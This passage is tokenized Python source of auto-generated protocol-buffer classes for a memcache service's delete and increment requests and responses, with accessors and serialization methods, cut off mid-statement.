"""<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class MemcacheDeleteResponse ( ProtocolBuffer . ProtocolMessage ) : <EOL> DELETED = <NUM_LIT:1> <EOL> NOT_FOUND = <NUM_LIT:2> <EOL> _DeleteStatusCode_NAMES = { <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> } <EOL> def DeleteStatusCode_Name ( cls , x ) : return cls . _DeleteStatusCode_NAMES . get ( x , "<STR_LIT>" ) <EOL> DeleteStatusCode_Name = classmethod ( DeleteStatusCode_Name ) <EOL> def __init__ ( self , contents = None ) : <EOL> self . delete_status_ = [ ] <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def delete_status_size ( self ) : return len ( self . delete_status_ ) <EOL> def delete_status_list ( self ) : return self . delete_status_ <EOL> def delete_status ( self , i ) : <EOL> return self . delete_status_ [ i ] <EOL> def set_delete_status ( self , i , x ) : <EOL> self . delete_status_ [ i ] = x <EOL> def add_delete_status ( self , x ) : <EOL> self . delete_status_ . append ( x ) <EOL> def clear_delete_status ( self ) : <EOL> self . delete_status_ = [ ] <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> for i in xrange ( x . delete_status_size ( ) ) : self . add_delete_status ( x . delete_status ( i ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if len ( self . delete_status_ ) != len ( x . delete_status_ ) : return <NUM_LIT:0> <EOL> for e1 , e2 in zip ( self . delete_status_ , x . delete_status_ ) : <EOL> if e1 != e2 : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:1> * len ( self . delete_status_ ) <EOL> for i in xrange ( len ( self . delete_status_ ) ) : n += self . lengthVarInt64 ( self . delete_status_ [ i ] ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:1> * len ( self . delete_status_ ) <EOL> for i in xrange ( len ( self . delete_status_ ) ) : n += self . lengthVarInt64 ( self . delete_status_ [ i ] ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_delete_status ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> for i in xrange ( len ( self . delete_status_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:8> ) <EOL> out . putVarInt32 ( self . delete_status_ [ i ] ) <EOL> def OutputPartial ( self , out ) : <EOL> for i in xrange ( len ( self . delete_status_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:8> ) <EOL> out . putVarInt32 ( self . delete_status_ [ i ] ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:8> : <EOL> self . add_delete_status ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> cnt = <NUM_LIT:0> <EOL> for e in self . delete_status_ : <EOL> elm = "<STR_LIT>" <EOL> if printElemNumber : elm = "<STR_LIT>" % cnt <EOL> res += prefix + ( "<STR_LIT>" % ( elm , self . DebugFormatInt32 ( e ) ) ) <EOL> cnt += <NUM_LIT:1> <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kdelete_status = <NUM_LIT:1> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> } , <NUM_LIT:1> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . NUMERIC , <EOL> } , <NUM_LIT:1> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class MemcacheIncrementRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> INCREMENT = <NUM_LIT:1> <EOL> DECREMENT = <NUM_LIT:2> <EOL> _Direction_NAMES = { <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> } <EOL> def Direction_Name ( cls , x ) : return cls . _Direction_NAMES . get ( x , "<STR_LIT>" ) <EOL> Direction_Name = classmethod ( Direction_Name ) <EOL> has_key_ = <NUM_LIT:0> <EOL> key_ = "<STR_LIT>" <EOL> has_name_space_ = <NUM_LIT:0> <EOL> name_space_ = "<STR_LIT>" <EOL> has_delta_ = <NUM_LIT:0> <EOL> delta_ = <NUM_LIT:1> <EOL> has_direction_ = <NUM_LIT:0> <EOL> direction_ = <NUM_LIT:1> <EOL> has_initial_value_ = <NUM_LIT:0> <EOL> initial_value_ = <NUM_LIT:0> <EOL> has_initial_flags_ = <NUM_LIT:0> <EOL> initial_flags_ = <NUM_LIT:0> <EOL> has_override_ = <NUM_LIT:0> <EOL> override_ = None <EOL> def __init__ ( self , contents = None ) : <EOL> self . lazy_init_lock_ = thread . allocate_lock ( ) <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def key ( self ) : return self . key_ <EOL> def set_key ( self , x ) : <EOL> self . has_key_ = <NUM_LIT:1> <EOL> self . key_ = x <EOL> def clear_key ( self ) : <EOL> if self . has_key_ : <EOL> self . has_key_ = <NUM_LIT:0> <EOL> self . key_ = "<STR_LIT>" <EOL> def has_key ( self ) : return self . has_key_ <EOL> def name_space ( self ) : return self . name_space_ <EOL> def set_name_space ( self , x ) : <EOL> self . has_name_space_ = <NUM_LIT:1> <EOL> self . name_space_ = x <EOL> def clear_name_space ( self ) : <EOL> if self . has_name_space_ : <EOL> self . has_name_space_ = <NUM_LIT:0> <EOL> self . name_space_ = "<STR_LIT>" <EOL> def has_name_space ( self ) : return self . has_name_space_ <EOL> def delta ( self ) : return self . delta_ <EOL> def set_delta ( self , x ) : <EOL> self . has_delta_ = <NUM_LIT:1> <EOL> self . delta_ = x <EOL> def clear_delta ( self ) : <EOL> if self . has_delta_ : <EOL> self . has_delta_ = <NUM_LIT:0> <EOL> self . delta_ = <NUM_LIT:1> <EOL> def has_delta ( self ) : return self . has_delta_ <EOL> def direction ( self ) : return self . direction_ <EOL> def set_direction ( self , x ) : <EOL> self . has_direction_ = <NUM_LIT:1> <EOL> self . direction_ = x <EOL> def clear_direction ( self ) : <EOL> if self . has_direction_ : <EOL> self . has_direction_ = <NUM_LIT:0> <EOL> self . direction_ = <NUM_LIT:1> <EOL> def has_direction ( self ) : return self . has_direction_ <EOL> def initial_value ( self ) : return self . initial_value_ <EOL> def set_initial_value ( self , x ) : <EOL> self . has_initial_value_ = <NUM_LIT:1> <EOL> self . initial_value_ = x <EOL> def clear_initial_value ( self ) : <EOL> if self . has_initial_value_ : <EOL> self . has_initial_value_ = <NUM_LIT:0> <EOL> self . initial_value_ = <NUM_LIT:0> <EOL> def has_initial_value ( self ) : return self . has_initial_value_ <EOL> def initial_flags ( self ) : return self . initial_flags_ <EOL> def set_initial_flags ( self , x ) : <EOL> self . has_initial_flags_ = <NUM_LIT:1> <EOL> self . initial_flags_ = x <EOL> def clear_initial_flags ( self ) : <EOL> if self . has_initial_flags_ : <EOL> self . has_initial_flags_ = <NUM_LIT:0> <EOL> self . initial_flags_ = <NUM_LIT:0> <EOL> def has_initial_flags ( self ) : return self . has_initial_flags_ <EOL> def override ( self ) : <EOL> if self . override_ is None : <EOL> self . lazy_init_lock_ . acquire ( ) <EOL> try : <EOL> if self . override_ is None : self . override_ = AppOverride ( ) <EOL> finally : <EOL> self . lazy_init_lock_ . release ( ) <EOL> return self . override_ <EOL> def mutable_override ( self ) : self . has_override_ = <NUM_LIT:1> ; return self . override ( ) <EOL> def clear_override ( self ) : <EOL> if self . has_override_ : <EOL> self . has_override_ = <NUM_LIT:0> ; <EOL> if self . override_ is not None : self . override_ . Clear ( ) <EOL> def has_override ( self ) : return self . has_override_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_key ( ) ) : self . set_key ( x . key ( ) ) <EOL> if ( x . has_name_space ( ) ) : self . set_name_space ( x . name_space ( ) ) <EOL> if ( x . has_delta ( ) ) : self . set_delta ( x . delta ( ) ) <EOL> if ( x . has_direction ( ) ) : self . set_direction ( x . direction ( ) ) <EOL> if ( x . has_initial_value ( ) ) : self . set_initial_value ( x . initial_value ( ) ) <EOL> if ( x . has_initial_flags ( ) ) : self . set_initial_flags ( x . initial_flags ( ) ) <EOL> if ( x . has_override ( ) ) : self . mutable_override ( ) . MergeFrom ( x . override ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_key_ != x . has_key_ : return <NUM_LIT:0> <EOL> if self . has_key_ and self . key_ != x . key_ : return <NUM_LIT:0> <EOL> if self . has_name_space_ != x . has_name_space_ : return <NUM_LIT:0> <EOL> if self . has_name_space_ and self . name_space_ != x . name_space_ : return <NUM_LIT:0> <EOL> if self . has_delta_ != x . has_delta_ : return <NUM_LIT:0> <EOL> if self . has_delta_ and self . delta_ != x . delta_ : return <NUM_LIT:0> <EOL> if self . has_direction_ != x . has_direction_ : return <NUM_LIT:0> <EOL> if self . has_direction_ and self . direction_ != x . direction_ : return <NUM_LIT:0> <EOL> if self . has_initial_value_ != x . has_initial_value_ : return <NUM_LIT:0> <EOL> if self . has_initial_value_ and self . initial_value_ != x . initial_value_ : return <NUM_LIT:0> <EOL> if self . has_initial_flags_ != x . has_initial_flags_ : return <NUM_LIT:0> <EOL> if self . has_initial_flags_ and self . initial_flags_ != x . initial_flags_ : return <NUM_LIT:0> <EOL> if self . has_override_ != x . has_override_ : return <NUM_LIT:0> <EOL> if self . has_override_ and self . override_ != x . override_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_key_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( self . has_override_ and not self . override_ . IsInitialized ( debug_strs ) ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . key_ ) ) <EOL> if ( self . has_name_space_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . name_space_ ) ) <EOL> if ( self . has_delta_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . delta_ ) <EOL> if ( self . has_direction_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . direction_ ) <EOL> if ( self . has_initial_value_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . initial_value_ ) <EOL> if ( self . has_initial_flags_ ) : n += <NUM_LIT:5> <EOL> if ( self . has_override_ ) : n += <NUM_LIT:1> + self . lengthString ( self . override_ . ByteSize ( ) ) <EOL> return n + <NUM_LIT:1> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_key_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . key_ ) ) <EOL> if ( self . has_name_space_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . name_space_ ) ) <EOL> if ( self . has_delta_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . delta_ ) <EOL> if ( self . has_direction_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . direction_ ) <EOL> if ( self . has_initial_value_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . initial_value_ ) <EOL> if ( self . has_initial_flags_ ) : n += <NUM_LIT:5> <EOL> if ( self . has_override_ ) : n += <NUM_LIT:1> + self . lengthString ( self . override_ . ByteSizePartial ( ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_key ( ) <EOL> self . clear_name_space ( ) <EOL> self . clear_delta ( ) <EOL> self . clear_direction ( ) <EOL> self . clear_initial_value ( ) <EOL> self . clear_initial_flags ( ) <EOL> self . clear_override ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . key_ ) <EOL> if ( self . has_delta_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarUint64 ( self . delta_ ) <EOL> if ( self . has_direction_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . direction_ ) <EOL> if ( self . has_name_space_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . name_space_ ) <EOL> if ( self . has_initial_value_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarUint64 ( self . initial_value_ ) <EOL> if ( self . has_initial_flags_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . put32 ( self . initial_flags_ ) <EOL> if ( self . has_override_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . override_ . ByteSize ( ) ) <EOL> self . override_ . OutputUnchecked ( out ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_key_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . key_ ) <EOL> if ( self . has_delta_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarUint64 ( self . delta_ ) <EOL> if ( self . has_direction_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . direction_ ) <EOL> if ( self . has_name_space_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . name_space_ ) <EOL> if ( self . has_initial_value_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarUint64 ( self . initial_value_ ) <EOL> if ( self . has_initial_flags_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . put32 ( self . initial_flags_ ) <EOL> if ( self . has_override_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . override_ . ByteSizePartial ( ) ) <EOL> self . override_ . OutputPartial ( out ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_key ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT:16> : <EOL> self . set_delta ( d . getVarUint64 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_direction ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_name_space ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_initial_value ( d . getVarUint64 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_initial_flags ( d . get32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . mutable_override ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_key_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . key_ ) ) <EOL> if self . has_name_space_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . name_space_ ) ) <EOL> if self . has_delta_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt64 ( self . delta_ ) ) <EOL> if self . has_direction_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . direction_ ) ) <EOL> if self . has_initial_value_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt64 ( self . initial_value_ ) ) <EOL> if self . has_initial_flags_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatFixed32 ( self . initial_flags_ ) ) <EOL> if self . has_override_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . override_ . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kkey = <NUM_LIT:1> <EOL> kname_space = <NUM_LIT:4> <EOL> kdelta = <NUM_LIT:2> <EOL> kdirection = <NUM_LIT:3> <EOL> kinitial_value = <NUM_LIT:5> <EOL> kinitial_flags = <NUM_LIT:6> <EOL> koverride = <NUM_LIT:7> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT:key>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:5> : "<STR_LIT>" , <EOL> <NUM_LIT:6> : "<STR_LIT>" , <EOL> <NUM_LIT:7> : "<STR_LIT>" , <EOL> } , <NUM_LIT:7> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:4> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:5> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:6> : ProtocolBuffer . Encoder . FLOAT , <EOL> <NUM_LIT:7> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:7> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class MemcacheIncrementResponse ( ProtocolBuffer . ProtocolMessage ) : <EOL> OK = <NUM_LIT:1> <EOL> NOT_CHANGED = <NUM_LIT:2> <EOL> ERROR = <NUM_LIT:3> <EOL> _IncrementStatusCode_NAMES = { <EOL> <NUM_LIT:1> : "<STR_LIT:OK>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> } <EOL> def IncrementStatusCode_Name ( cls , x ) : return cls . _IncrementStatusCode_NAMES . get ( x , "<STR_LIT>" ) <EOL> IncrementStatusCode_Name = classmethod ( IncrementStatusCode_Name ) <EOL> has_new_value_ = <NUM_LIT:0> <EOL> new_value_ = <NUM_LIT:0> <EOL> has_increment_status_ = <NUM_LIT:0> <EOL> increment_status_ = <NUM_LIT:0> <EOL> def __init__ ( self , contents = None ) : <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def new_value ( self ) : return self . new_value_ <EOL> def set_new_value ( self , x ) : <EOL> self . has_new_value_ = <NUM_LIT:1> <EOL> self . new_value_ = x <EOL> def clear_new_value ( self ) : <EOL> if self . has_new_value_ : <EOL> self . has_new_value_ = <NUM_LIT:0> <EOL> self . new_value_ = <NUM_LIT:0> <EOL> def has_new_value ( self ) : return self . has_new_value_ <EOL> def increment_status ( self ) : return self . increment_status_ <EOL> def set_increment_status ( self , x ) : <EOL> self . has_increment_status_ = <NUM_LIT:1> <EOL> self . increment_status_ = x <EOL> def clear_increment_status ( self ) : <EOL> if self . has_increment_status_ : <EOL> self . has_increment_status_ = <NUM_LIT:0> <EOL> self . increment_status_ = <NUM_LIT:0> <EOL> def has_increment_status ( self ) : return self . has_increment_status_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_new_value ( ) ) : self . set_new_value ( x . new_value ( ) ) <EOL> if ( x . has_increment_status ( ) ) : self . set_increment_status ( x . increment_status ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_new_value_ != x . has_new_value_ : return <NUM_LIT:0> <EOL> if self . has_new_value_ and self . new_value_ != x . new_value_ : return <NUM_LIT:0> <EOL> if self . has_increment_status_ != x . has_increment_status_ : return <NUM_LIT:0> <EOL> if self . has_increment_status_ and self . increment_status_ != x . increment_status_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_new_value_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . new_value_ ) <EOL> if ( self . has_increment_status_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . increment_status_ ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_new_value_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . new_value_ ) <EOL> if ( self . has_increment_status_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . increment_status_ ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_new_value ( ) <EOL> self . clear_increment_status ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> if ( self . has_new_value_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:8> ) <EOL> out . putVarUint64 ( self . new_value_ ) <EOL> if ( self . has_increment_status_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt32 ( self . increment_status_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_new_value_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:8> ) <EOL> out . putVarUint64 ( self . new_value_ ) <EOL> if ( self . has_increment_status_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt32 ( self . increment_status_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:8> : <EOL> self . set_new_value ( d . getVarUint64 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT:16> : <EOL> self . set_increment_status ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_new_value_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt64 ( self . new_value_ ) ) <EOL> if self . has_increment_status_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . increment_status_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> knew_value = <NUM_LIT:1> <EOL> kincrement_status = <NUM_LIT:2> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> } , <NUM_LIT:2> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . NUMERIC , <EOL> } , <NUM_LIT:2> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class MemcacheBatchIncrementRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_name_space_ = <NUM_LIT:0> <EOL> name_space_ = "<STR_LIT>" <EOL> has_override_ = <NUM_LIT:0> <EOL> override_ = None <EOL> def __init__ ( self , contents = None ) : <EOL> self . item_ = [ ] <EOL> self . lazy_init_lock_ = thread . allocate_lock ( ) <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def name_space ( self ) : return self . name_space_ <EOL> def set_name_space ( self , x ) : <EOL> self . has_name_space_ = <NUM_LIT:1> <EOL> self . name_space_ = x <EOL> def clear_name_space ( self ) : <EOL> if self . has_name_space_ : <EOL> self . has_name_space_ = <NUM_LIT:0> <EOL> self . name_space_ = "<STR_LIT>" <EOL> def has_name_space ( self ) : return self . has_name_space_ <EOL> def item_size ( self ) : return len ( self . item_ ) <EOL> def item_list ( self ) : return self . item_ <EOL> def item ( self , i ) : <EOL> return self . item_ [ i ] <EOL> def mutable_item ( self , i ) : <EOL> return self . item_ [ i ] <EOL> def add_item ( self ) : <EOL> x = MemcacheIncrementRequest ( ) <EOL> self . item_ . append ( x ) <EOL> return x <EOL> def clear_item ( self ) : <EOL> self . item_ = [ ] <EOL> def override ( self ) : <EOL> if self . override_ is None : <EOL> self . lazy_init_lock_ . acquire ( ) <EOL> try : <EOL> if self . override_ is None : self . override_ = AppOverride ( ) <EOL> finally : <EOL> self . lazy_init_lock_ . release ( ) <EOL> return self . override_ <EOL> def mutable_override ( self ) : self . has_override_ = <NUM_LIT:1> ; return self . override ( ) <EOL> def clear_override ( self ) : <EOL> if self . has_override_ : <EOL> self . has_override_ = <NUM_LIT:0> ; <EOL> if self . override_ is not None : self . override_ . Clear ( ) <EOL> def has_override ( self ) : return self . has_override_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_name_space ( ) ) : self . set_name_space ( x . name_space ( ) ) <EOL> for i in xrange ( x . item_size ( ) ) : self . add_item ( ) . CopyFrom ( x . item ( i ) ) <EOL> if ( x . has_override ( ) ) : self . mutable_override ( ) . MergeFrom ( x . override ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_name_space_ != x . has_name_space_ : return <NUM_LIT:0> <EOL> if self . has_name_space_ and self . name_space_ != x . name_space_ : return <NUM_LIT:0> <EOL> if len ( self . item_ ) != len ( x . item_ ) : return <NUM_LIT:0> <EOL> for e1 , e2 in zip ( self . item_ , x . item_ ) : <EOL> if e1 != e2 : return <NUM_LIT:0> <EOL> if self . has_override_ != x . has_override_ : return <NUM_LIT:0> <EOL> if self . has_override_ and self . override_ != x . override_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> for p in self . item_ : <EOL> if not p . IsInitialized ( debug_strs ) : initialized = <NUM_LIT:0> <EOL> if ( self . has_override_ and not self . override_ . IsInitialized ( debug_strs ) ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_name_space_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . name_space_ ) ) <EOL> n += <NUM_LIT:1> * len ( self . item_ ) <EOL> for i in xrange ( len ( self . item_ ) ) : n += self . lengthString ( self . item_ [ i ] . ByteSize ( ) ) <EOL> if ( self . has_override_ ) : n += <NUM_LIT:1> + self . lengthString ( self . override_ . ByteSize ( ) ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_name_space_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . name_space_ ) ) <EOL> n += <NUM_LIT:1> * len ( self . item_ ) <EOL> for i in xrange ( len ( self . item_ ) ) : n += self . lengthString ( self . item_ [ i ] . ByteSizePartial ( ) ) <EOL> if ( self . has_override_ ) : n += <NUM_LIT:1> + self . lengthString ( self . override_ . ByteSizePartial ( ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_name_space ( ) <EOL> self . clear_item ( ) <EOL> self . clear_override ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> if ( self . has_name_space_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . name_space_ ) <EOL> for i in xrange ( len ( self . item_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . item_ [ i ] . ByteSize ( ) ) <EOL> self . item_ [ i ] . OutputUnchecked ( out ) <EOL> if ( self . has_override_ ) : <EOL> out . putVarInt32 ( 